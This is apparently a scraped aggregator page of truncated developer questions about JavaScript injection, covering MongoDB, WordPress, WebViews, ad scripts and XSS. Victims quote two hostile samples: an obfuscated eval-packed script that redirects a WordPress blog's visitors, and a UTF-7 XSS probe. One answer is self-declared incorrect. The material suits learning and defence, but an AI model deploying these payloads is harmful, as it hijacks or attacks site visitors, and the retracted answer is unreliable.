javascript-injection

JavaScript NoSQL Injection prevention in MongoDB

你。 submitted on 2019-12-17 18:57:46
Question: How can I prevent JavaScript NoSQL injections into MongoDB? I am working on a Node.js application and I am passing req.body, which is a JSON object, into the mongoose model's save function. I thought there were safeguards behind the scenes, but this doesn't appear to be the case.

Answer 1: Note: My answer is incorrect. Please refer to other answers. -- As a client program assembles a query in MongoDB, it builds a BSON object, not a string. Thus traditional SQL injection attacks are not a problem.

How to dynamically insert a <script> tag via jQuery after page load?

China☆狼群 submitted on 2019-12-16 22:22:34
Question: I'm having problems getting this to work. I first tried setting my script tags as strings and then using jQuery replaceWith() to add them to the document after page load: var a = '<script type="text/javascript">some script here</script>'; $('#someelement').replaceWith(a); But I got string literal errors on that var. I then tried encoding the string like: var a = '&left;script type="text/javascript">some script here<\/script>'; but sending that to replaceWith() outputs just that string to the

Javascript Injection prevention on Wordpress

我与影子孤独终老i submitted on 2019-12-10 18:23:56
Question: My blog on WordPress gets the following malicious script injected: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{})

Injecting JavaScript into UIWebView

怎甘沉沦 submitted on 2019-12-08 09:55:02
Question: I am trying to use the stringByEvaluatingJavaScriptFromString: to alter a WebView and it's not executing as I expect. Here is the code, this JS doesn't execute though. Any idea why? UIWebView *wv = [[UIWebView alloc] init]; NSURL *url = [[NSURL alloc] initWithString:@"http://www.google.com"]; NSURLRequest *request = [[NSURLRequest alloc] initWithURL:url]; [wv loadRequest:request]; [wv stringByEvaluatingJavaScriptFromString:@"document.write('This Works')"];

Answer 1: Probably you'll have to wait for

How to block google ads from injecting JavaScript

别说谁变了你拦得住时间么 submitted on 2019-12-08 04:10:56
Question: Some Google ads start injecting JavaScript and popping ads all over the screen. How can I block these random scripts that are injected through Google ads?

Answer 1: This is not perfect, but it seems to be very effective in my case (all pages are SSL) and also prevents SSL mixed mode messages caused by Google ads third party plugin scripts... <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests; object-src 'none'"> Content-Security-Policy is critical to prevent mixed content

Injecting Javascript bridge in WebView

可紊 submitted on 2019-12-06 23:55:14
Question: I want to pull some stuff from a webpage in Android. I know there are libraries to parse HTML, but I thought maybe I could cheat a little bit. Here's what I'm doing..
- Programmatically create a WebView using the application context so it doesn't have to be displayed in the UI.
- Load the web page
- Attach the JS Interface
- Inject some Javascript to interact with the host application
Here's some code... public void getLatestVersion(){ Log.e("Testing", "getLatestVersion called..."); WebView webview =

How to block google ads from injecting JavaScript

℡╲_俬逩灬. submitted on 2019-12-06 21:04:33
Some Google ads start injecting JavaScript and popping ads all over the screen. How can I block these random scripts that are injected through Google ads?

This is not perfect, but it seems to be very effective in my case (all pages are SSL) and also prevents SSL mixed mode messages caused by Google ads third party plugin scripts... <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests; object-src 'none'"> Content-Security-Policy is critical to prevent mixed content errors (too many errors can show a "connection not secure" by the browser and memory leaks) https://blog

Questions about Javascript injection

两盒软妹~` submitted on 2019-12-06 04:09:09
Question: I've been reading on the asp.net mvc learning site about JavaScript injection and man it is an eye opener. I never even realized/thought about someone using JavaScript to do some weird ass injection attacks. It however left me with some unanswered questions. First, when do you use html.encode? Like do you use it only when you are going to display information that that user or some other user had submitted? Or do I use it for everything. Like say I have a form that a user submits, this information will

Injecting Javascript bridge in WebView

此生再无相见时 submitted on 2019-12-05 04:20:36
I want to pull some stuff from a webpage in Android. I know there are libraries to parse HTML, but I thought maybe I could cheat a little bit. Here's what I'm doing..
- Programmatically create a WebView using the application context so it doesn't have to be displayed in the UI.
- Load the web page
- Attach the JS Interface
- Inject some Javascript to interact with the host application
Here's some code... public void getLatestVersion(){ Log.e("Testing", "getLatestVersion called..."); WebView webview = new WebView(context.getApplicationContext()); webview.loadUrl("https://example.com"); webview

Attempted exploit?

巧了我就是萌 submitted on 2019-12-04 17:49:38
Question: I saw that my nopCommerce site had a logged search for: ADw-script AD4-alert(202) ADw-/script AD4- I'm a bit curious though what they were trying to accomplish. I searched a bit for it and apparently the ADw-script AD4- encodes in UTF7 to <script> . But why the alert(202) ? Were they just checking for vulnerabilities? More hacking attempts were logged and I made a new question about them here: Hacking attempt, what were they trying to do and how can I check if they succeeded?

Answer 1: Someone is